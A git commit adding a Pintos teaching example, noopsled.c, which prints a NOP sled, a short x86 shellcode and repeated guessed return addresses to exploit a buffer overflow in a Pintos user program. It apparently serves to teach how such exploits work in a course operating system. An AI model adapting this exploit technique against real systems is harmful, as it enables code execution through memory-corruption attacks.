From e7bc50ca8ffcaa6ed68ebd2315f78b0f5a7d10ad Mon Sep 17 00:00:00 2001
From: klaar36 <klas.arvidsson@liu.se>
Date: Fri, 20 Mar 2015 17:30:24 +0100
Subject: Initial Pintos

---
 src/examples/noopsled.c | 44 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 src/examples/noopsled.c

(limited to 'src/examples/noopsled.c')

diff --git a/src/examples/noopsled.c b/src/examples/noopsled.c
new file mode 100644
index 0000000..d091d5d
--- /dev/null
+++ b/src/examples/noopsled.c
@@ -0,0 +1,44 @@
+/* klaar@ida
+
+   Program to generate a noop sled with accompanying shellcode and a
+   good guess as of where all of this data ends up when a buffer
+   overflow is exploited in pintos.
+ 
+   This program runs outside pintos. Pipe the output to a pintos
+   program with faulty buffer handling to exploit a buffer overflow.
+
+   gcc noopsled.c -o noopsled
+ */
+
+#include <stdio.h>
+
+char shellcode[] =
+  "\x90\x90\x90\x90\x90\xe9\x0b\x00"
+  "\x00\x00\x6a\x02\xcd\x30\x31\xc0"
+  "\x50\x40\x50\xcd\x30\xe8\xf0\xff"
+  "\xff\xff""crack";
+
+char x86_nop = '\x90';
+
+unsigned guess = 0xc0000000 - 2000 - 300;
+
+int main() //int argc, char* argv[])
+{
+  int i;
+  
+  for (i = 0; i < 128; ++i)
+    printf("%c", x86_nop);
+
+  for (i = 0; i < 32; ++i)
+    printf("%c", shellcode[i]);
+    
+  for (i = 0; i < (128-32)/4; ++i)
+  {
+    char* g = (char*)&guess;
+    printf("%c", g[3]);
+    printf("%c", g[2]);
+    printf("%c", g[1]);
+    printf("%c", g[0]);
+  }    
+  printf("\n\n");
+}
-- 
cgit v1.2.1